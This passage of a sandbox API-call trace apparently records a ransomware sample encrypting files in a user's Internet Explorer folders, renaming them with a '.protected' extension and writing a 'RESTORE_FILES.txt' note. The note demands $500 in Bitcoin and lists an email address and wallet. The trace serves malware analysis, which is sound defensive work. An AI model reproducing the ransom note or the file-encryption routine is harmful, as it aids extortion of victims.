out: lpNewFilePointer=0x0) returned 1 [0084.854] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.854] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.854] CloseHandle (hObject=0x14c) returned 1 [0084.854] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.protected") returned 104 [0084.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat.protected")) returned 1 [0084.855] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Windows") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Program Files") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="Program Files (x86)") returned -1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="$Recycle.bin") returned 1 [0084.855] lstrcmpiW (lpString1="MSIMGSIZ.DAT", lpString2="System Volume Information") returned -1 [0084.855] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.855] StrStrIW (lpFirst="MSIMGSIZ.DAT", lpSrch=".protected") returned 0x0 [0084.855] lstrcmpW (lpString1="MSIMGSIZ.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0084.855] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: 
pbBuffer=0x295e9dc) returned 1 [0084.856] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".txt") returned 0x0 [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".rar") returned 0x0 [0084.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT") returned 88 [0084.857] StrStrW (lpFirst="MSIMGSIZ.DAT", lpSrch=".zip") returned 0x0 [0084.857] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.858] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.858] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.859] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.859] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.859] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.859] CloseHandle (hObject=0x14c) returned 1 [0084.859] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.protected") returned 98 [0084.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.protected")) returned 1 [0084.860] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Program Files") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="Program Files (x86)") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1="Recovery", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned 84 [0084.860] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0084.860] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*") returned 86 [0084.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.860] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.860] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\.") returned 86 [0084.860] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.860] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.860] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.860] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.860] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet 
Explorer\\Recovery\\..") returned 87 [0084.860] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.861] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.861] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Windows") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Program Files") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="Program Files (x86)") returned -1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="$Recycle.bin") returned 1 [0084.861] lstrcmpiW (lpString1="Active", lpString2="System Volume Information") returned -1 [0084.861] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 91 [0084.861] lstrcmpW (lpString1="Active", lpString2=".") returned 1 [0084.861] lstrcmpW (lpString1="Active", lpString2="..") returned 1 [0084.861] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*") returned 93 [0084.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.861] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.861] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.861] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.861] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\.") returned 93 [0084.861] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.861] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.862] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.862] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.862] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\..") returned 94 [0084.862] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.862] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.862] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.862] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.862] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RESTORE_FILES.txt") returned 109 [0084.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.862] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.862] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.863] lstrlenA (lpString="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") returned 684 [0084.863] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.863] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.863] CloseHandle (hObject=0x150) returned 1 [0084.863] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Windows") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Program Files") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="Program Files (x86)") returned -1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="$Recycle.bin") returned 1 [0084.863] lstrcmpiW (lpString1="Last Active", lpString2="System Volume Information") returned -1 [0084.864] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active") returned 96 [0084.864] lstrcmpW (lpString1="Last Active", lpString2=".") returned 1 [0084.864] lstrcmpW (lpString1="Last Active", lpString2="..") returned 1 [0084.864] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*") returned 98 [0084.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.865] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.865] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0084.865] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.865] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\.") returned 98 [0084.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.865] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.866] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.866] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\..") returned 99 [0084.866] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.866] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.866] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned 1 [0084.866] lstrcmpiW 
(lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.866] lstrcmpiW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.866] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrIW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.866] lstrcmpW (lpString1="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.866] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.866] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.866] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 153 [0084.866] StrStrW (lpFirst="RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.866] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xe00, lpOverlapped=0x0) returned 1 [0084.878] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xe00, lpOverlapped=0x0) returned 1 [0084.878] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.878] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.879] CloseHandle (hObject=0x154) returned 1 [0084.879] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 163 [0084.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.880] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Program Files") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.880] lstrcmpiW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.880] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last 
Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.880] StrStrIW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.880] lstrcmpW (lpString1="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.880] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.880] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.881] lstrlenW 